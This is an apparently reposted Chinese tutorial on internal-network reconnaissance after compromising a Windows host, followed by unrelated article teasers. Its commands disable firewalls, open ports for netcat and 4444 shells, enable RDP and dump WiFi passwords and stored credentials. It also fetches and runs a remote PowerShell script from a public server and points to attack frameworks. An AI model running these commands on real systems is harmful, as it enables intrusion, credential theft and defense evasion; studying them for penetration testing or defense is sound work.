内网信息收集:手动、脚本和工具查IP、端口

news2024/11/16 5:51:06

1.手动查IP和端口

2.工具查IP

3.工具查端口



我们在内网中拿下目标机器后,需要进行一系列的信息收集,以下为总结的收集方法

1.手动信息收集:

以下命令在CS执行时命令前须加shell,如:shell ipconfig

1.收集IP网卡: ipconfig

2.收集操作系统和软件信息: systeminfo

3.查看操作系统的体系结构:echo %PROCESSOR_ARCHITECTURE%

4.查看目录和文件夹:shell dir shell type 文件名

5.查看操作系统的软件及版本信息:

powershell "Get‐WmiObject ‐class win32_product | Select‐Object ‐Property name,version"

6.本机的服务信息: wmic service list brief

7.查看进程信息: wmic process list brief/tasklist

8.查看启动程序信息: wmic startup get command,caption

9.计划任务信息:schtasks /query /fo LIST /v

10.查看主机开机信息:shell net statistics workstation

11.查看用户列表:shell user/wmic useraccount get name ,SID

12.查看会话:net session

13.查看端口:netstat -ano

14.查看补丁信息:systeminfo 或者

 wmic qfe get Caption,Description,HotFixID,InstalledOn

15.查看共享列表:netshare / wmic share get name,path,status(可能横向移动)

16.路由信息: route print

防火墙相关操作:

1.查看防火墙是否开启: netsh firewall show state

2.关闭防火墙:  

Windows server 2003:     netsh firewall set opmode disable

Windows server 2003之后:  netsh firewall set opmode disable 或者netsh advfirewall set allprofiles state off

3.查看防火墙配置: netsh firewall show config

4.修改防火墙:

2003之前版本,允许指定程序进行全部连接:

netsh firewall add allowedprogram c:\nc.exe "allownc" enable 

2003之后版本,允许指定程序连接:

 netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

允许指定程序退出:

 netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C: \nc.exe"

允许3389端口放行:

 netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow

允许4444端口进站:

 netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=4444

允许4444端口出站:

 netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=4444

允许a.exe进站:

shell netsh advfirewall firewall add rule name=test dir=in action=allow program=c:\a.exe

允许a.exe出站:

shell netsh advfirewall firewall add rule name=test dir=out action=allow 

program=c:\a.exe

开启远程服务:

1.2003机器:

wmic path win32_terminalservicesetting where (_CLASS !="") call setallowtsconnections 1

2.在server2008和server 2021:

开启:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

WIFI密码收集:

 for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  @echo %j | findstr ‐i ‐v echo |  netsh wlan show profiles %j key=clear

查询RDP端口:

 reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP‐Tcp" /V PortNumber

注意: oxd3d为3389端口

查看代理信息:

 reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

查看登录凭证:

shell cmdkey /l

ARP信息: arp-a

最近打开的文档:

 dir %APPDATA%\Microsoft\Windows\Recent

查询本机用户组: net localgroup

管理员组成员列表:net localgroup administrators

RDP凭证:net localgroup administrators

杀毒软件查询: wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname /format:list

命令太多记不全,在目标机器创建一个bat脚本执行:

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set 
"var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> 
out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName 
/format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get 
Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,M
ACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace 
/format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> 
out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get 
Description,InstallDate,InstallLocation,PackageCache,Vendor,Version 
/format:"%var%" >> out.html
wmic os get 
name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUse
r,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> 
out.html

输出一个out.html网址,打开即为收集的信息,

也可以自己编写,这是一个简单的示例,可以将上面自己需要的命令写上去,导入到1.txt文件,执行以后查看即可:

2.工具查IP:

1.NetBIOS

这是一款用于扫描Windows网络上NetBIOS名字信息的程序。该程序对给出范围内的每一个地址发 送NetBIOS状态查询,并且以易读的表格列出接收到的信息,对于每个响应的主机,NBTScan列出 它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。但只能用于局域网,NBTSCAN可以取到 PC的真实IP地址和MAC地址,如果有”ARP攻击”在做怪,可以找到装有ARP攻击的PC的IP/和 MAC地址。但只能用于局域网 

nbtscan扫描:nbtscan.exe IP 

2.ICMP

除了利用NetBIOS探测内网,还可以利用ICMP协议探测内网。依次对内网中的每个IP地址执行ping 命令,可以快速找出内网中所有存活酌主机。在渗透测试中中,可以使用如下命令循环探测整个C段

直接用就行:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

3.ARP

使用arp协议进行IP探测,这个需要下载脚本

直接用:arp.exe -t IP/24

4.Kscan kscan

是一款资产]测绘工具,可针对指定资产进行端口扫描以及TCP指纹识别和Banner抓取,在不 发送更多的数据包的情况下尽可能的获取端口更多信息。并能够针对扫描结果进行自动化暴力破解, 且是go平台首款开源的RDP暴力破解工具 

下载地址:https://github.com/lcvvvv/kscan

利用:kscanw64.exe -t IP/24 --encoding gb2312(不乱码)

探测网段:kscanw64.exe --spy

其实Kscan还有很多用法,这里只是进行IP扫描,其他用法不再赘述,可以参考:

Kscan-简单的资产测绘工具_kscan使用方法-CSDN博客

5.fscan

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服 务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、 web漏洞扫描、netbios探测、域控识别等功能。

下载地址 https://github.com/lcvvvv/kscan

fscan扫描:fscan64.exe -h IP/24      它也有很多用法,参考以下:

fscan工具的使用_fscan使用-CSDN博客

6. Ladon

一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密 码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主 机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标 网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间 件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、 ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、 SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、 BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec /jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度 自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配 置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支 持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

利用:Lodan.exe IP/24 icmp    

使用参考:Ladon使用_ladon使用教程-CSDN博客

3.工具查端口

1.ScanLine

是一款windows下的端口扫描的命令行程序。它可以完成PING扫描、TCP端口扫描、UDP端口扫描等功 能。运行速度很快,不需要winPcap库支持,应用场合受限较少。

利用:

scanline.exe ‐bhpt 21‐23,25,80,110,135‐139,143,443,445,1433,1521,3306,3389,5556,5631,5900,8080  100.100.0.3

scanline.exe ‐bhpt 80,443 100.100.0.1‐254(IP)

scanline.exe ‐bhpt 139,445  IP

其他用法:

‐?         ‐ 显示此帮助文本

‐b          ‐ 获取端口横幅

‐c          ‐ TCP 和 UDP 尝试超时(毫秒)。 默认值为 4000

‐d          ‐ 扫描之间的延迟(毫秒)。 默认为 0

‐f          ‐ 从文件中读取 IP。 使用“stdin”作为标准输入

‐g          ‐ 绑定到给定的本地端口

‐h          ‐ 隐藏没有开放端口的系统的结果

‐i          ‐ 除了 Echo 请求之外,用于 ping 使用 ICMP 时间戳请求

‐j          ‐ 不要在 IP 之间输出“‐‐‐‐‐...”分隔符

‐l          ‐ 从文件中读取 TCP 端口

‐L          ‐ 从文件中读取 UDP 端口

‐m          ‐ 绑定到给定的本地接口 IP

‐n          ‐ 不扫描端口 ‐ 仅 ping(除非您使用 ‐p)

‐o          ‐ 输出文件(覆盖)

‐O          ‐ 输出文件(追加)

‐p          ‐ 扫描前不要 ping 主机

‐q          ‐ ping 超时(毫秒)。 默认值为 2000

‐r          ‐ 将 IP 地址解析为主机名

‐s          ‐ 以逗号分隔格式输出 (csv)

‐t          ‐ 要扫描的 TCP 端口(以逗号分隔的端口/范围列表) ‐T          ‐ 使用 TCP 端口的内部列表

‐u          ‐ 要扫描的 UDP 端口(以逗号分隔的端口/范围列表)

‐U          ‐ 使用 UDP 端口的内部列表

‐v          ‐ 详细模式

‐z          ‐ 随机化 IP 和端口扫描顺序 

2.PowerSpioit PowerSploit

是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中 的信息侦测,权限提升、权限维持等

下载地址: https://github.com/PowerShellMafia/PowerSploit

用法:

ActivirusBypass:发现杀毒软件的查杀特征     

CodeExecution:在目标主机上执行代码     

Exfiltration:目标主机上的信息搜集工具     

Mayhem:蓝屏等破坏性的脚本     

Persistence:后门脚本     

Privsec:提权等脚本     

Recon:以目标主机为跳板进行内网信息侦查     

ScriptModification:在目标主机上创建或修改脚本

本地执行(放到目标服务器):

shell powershell ‐exec bypass Import‐Module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

远程执行(不需要放到目标服务器,放到公网服务器,无文件加载):

powershell ‐exec bypass ‐c IEX (New‐Object 

System.Net.Webclient).DownloadString('IP:PORT/Invoke‐Portscan.ps1');import‐module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

3.Nishang Nishang

是一款针对PowerShell的渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不 是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源 什么的都不重要。总之,nishang也是一款不可多得的好工具。非常的好用。

下载地址 https://github.com/samratashok/nishang

利用:

CS上传,只能传ZIP,不能传文件

解压:shell unzip nishang.zip

使用方法:

允许导入:shell powershell Set‐ExecutionPolicy remotesigned   

扫描:

shell powershell ‐command "& { import‐module .\nishang\nishang.psm1; Invoke‐PortScan ‐StartAddress 192.168.11.1 ‐EndAddress 192.168.11.255 -Ports 445 ‐ResolveHost }"

另一种方式:先将nishang导入到CS目录里面:

导入模块:powershell -import .\nishang\nishang.psm1 (不需要再上传服务器)

扫描同上

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1910005.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

node-gyp 重新安装,解决编译遇到的问题【超详细图解】

一、报错信息 npm ERR! gyp info it worked if it ends with ok npm ERR! gyp info using node-gyp10.0.1 npm ERR! gyp info using node18.19.0 | darwin | arm64 npm ERR! gyp info find Python using Python version 3.12.2 found at "/opt/homebrew/opt/python3.12/…

js实现移动蒙版层

移动蒙版层 可在整个页面拖动方块&#xff0c;但方块不能超出页面 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0">…

人工智能算法工程师(中级)课程1-Opencv视觉处理之基本操作

大家好&#xff0c;我是微学AI&#xff0c;今天给大家介绍一下人工智能算法工程师(中级)课程1-Opencv视觉处理之基本操作。OpenCV&#xff08;Open Source Computer Vision Library&#xff09;是一个开源的计算机视觉和机器学习软件库。它提供了各种视觉处理函数&#xff0c;并…

Linux 创建新虚拟机的全过程图解

一、创建新虚拟机 1.选择自定义 2.直接下一步 3.选择稍后安装 4.设置虚拟机名和安装位置 5.配置处理器&#xff08;处理器数量&#xff1a;4、每个处理器的内核&#xff1a;2&#xff09; 6. 内存选择 7.网络类型 8. IO控制器类型-默认推荐 9.磁盘类型-默认推荐 10.选择虚拟磁…

xcode中对项目或者文件文件夹重命名操作

提起揭秘答案&#xff1a;选中文件后&#xff0c;按下回车键就可以了 如果在项目中对新建的文件夹或者文件名称不满意或者输入错误了&#xff0c;想要修改一下名称该怎么办&#xff1f;如果是在文件或文件夹上右键是没有rename选项的&#xff1a; 其实想要重命名&#xff0c;很…

minicoda python环境搭建-cnblog

anconnda精简版miniconda使用 Python和anconnda介绍 关于Python环境最出名的是Python和anconnda,Anconnda强的地方时anconnda不用每创建一个新项目&#xff0c;就配置一下虚拟环境。只需要创建一个Python环境包&#xff0c;电脑全局是通用的。但是Anconnda本身安装包大小就有一…

【Linux线程篇】探索Linux多线程:并行编程的入门指南

W...Y的主页 &#x1f60a; 代码仓库分享&#x1f495; Linux线程概念 什么是线程 在一个程序里的一个执行路线就叫做线程&#xff08;thread&#xff09;。更准确的定义是&#xff1a;线程是“一个进程内部的控制序列”一切进程至少都有一个执行线程线程在进程内部运行&am…

YOLO-World实时开集检测论文阅读

论文&#xff1a;《YOLO-World: Real-Time Open-Vocabulary Object Detection》 代码&#xff1a;https://github.com/AILab-CVC/YOLO-World 1.Abstract 我们介绍了YOLO World&#xff0c;这是一种创新的方法&#xff0c;通过在大规模数据集上进行视觉语言建模和预训练&#…

Alpha 3D扫描仪

3D视觉。就这么简单。 用于机器视觉任务的工业3D扫仪 规格表

k8s离线部署芋道源码前端

目录 概述 编译Dockerfile 构建Dockerfilenginx.conf构建 k8s部署前端镜像部署ingress 概述 本篇将对 k8s离线部署芋道源码前端 进行详细的说明&#xff0c;对如何构建 Dockerfile&#xff0c;如何整合 Nginx&#xff0c;如何整合 ingress 进行实践。 相关文章&#xff1a;naco…

热烈祝贺!全视通多家客户上榜全球自然指数TOP100!

2024年6月18日&#xff0c;全球医疗机构自然指数TOP100榜单发布&#xff0c;中国医疗机构在其中的表现尤为引人注目。 根据《自然》杂志网站发布的数据&#xff0c;此次公布的排名是基于&#xff08;2023年3月1日至2024年2月29日&#xff09;的统计数据&#xff0c;全球医疗机构…

【购物车案例】for循环为什么使用key

要做出一个简单的购物车界面。首先&#xff0c;有一个复选框&#xff0c;可以选择商品&#xff0c;后面紧跟的是商品名称&#xff0c;然后&#xff0c;是删除按钮&#xff0c;根据这个需求&#xff0c;先写出一个简单的界面&#xff0c;代码如下&#xff1a; <template>…

elasticSearch的索引库文档的增删改查

我们都知道&#xff0c;elasticsearch在进行搜索引擎的工作时&#xff0c;是会先把数据库中的信息存储一份到elasticsearch中&#xff0c;再去分词查询等之后的工作的。 elasticsearch中的文档数据会被序列化为json格式后存储在elasticsearch中。elasticsearch会对存储的数据进…

诺基亚老年机突然翻红,为了情怀你会入手吗?

在智能手机功能日益丰富的今天&#xff0c;诺基亚3210的回归&#xff0c;似乎为人们提供了一种逃离现代科技束缚的选项。这款曾经的经典手机&#xff0c;以其复古的外观和简单的功能&#xff0c;吸引了一批怀旧用户的追捧。然而&#xff0c;它真的能够满足现代人的需求吗&#…

探讨大数据在视频汇聚平台LntonCVS国标GB28181协议中的应用

随着摄像头和视频监控系统的普及和数字化程度的提高&#xff0c;视频监控系统产生的数据量急剧增加。大数据技术因其优秀的数据管理、分析和利用能力&#xff0c;成为提升视频监控系统效能和价值的重要工具。 大数据技术可以将视频监控数据与其他数据源进行融合分析&#xff0c…

【Golang】slice切片

slice Go语言的切片是对数组的抽象。 数组的使用 package mainimport ("fmt" )// 传递固定长度的数组还是值传递的方式 func printArray(myArray [5]int) {for index, value : range myArray {fmt.Println("index:", index, "value:", value)…

【深度学习】图形模型基础(5):线性回归模型第五部分:多变量线性回归模型

1.引言 当我们从基础的线性模型 y a b x error y a bx \text{error} yabxerror 转向更复杂的模型 y β 0 β 1 x 1 β 2 x 2 … error y \beta_0 \beta_1 x_1 \beta_2 x_2 \ldots \text{error} yβ0​β1​x1​β2​x2​…error 时&#xff0c;我们面临了诸多…

DNS知识点

📑打牌 : da pai ge的个人主页 🌤️个人专栏 : da pai ge的博客专栏 ☁️宝剑锋从磨砺出,梅花香自苦寒来 ​ 目录 一、DNS概念 二hosts 文件 DNS优缺点 三客户端域名解析顺序(优先级) 四原…

JVM:类的生命周期

文章目录 一、介绍二、加载阶段三、连接阶段四、初始化阶段 一、介绍 类的生命周期描述了一个类加载、连接&#xff08;验证、准备和解析&#xff09;、初始化、使用、卸载的整个过程。 加载&#xff08;Loading&#xff09;阶段第一步是类加载器根据类的权限定名通过不同的渠…

函数调用的堆栈过程

初始栈空间如下(可以拿来训练)&#xff1a; 代码执行之后&#xff1a; 代码&#xff1a; #include <iostream> int sum(int a, int b) { /* 00601800 push ebp 00601801 mov ebp,esp 006018A7 sub esp,4Ch 006018A7 reo stos */int temp …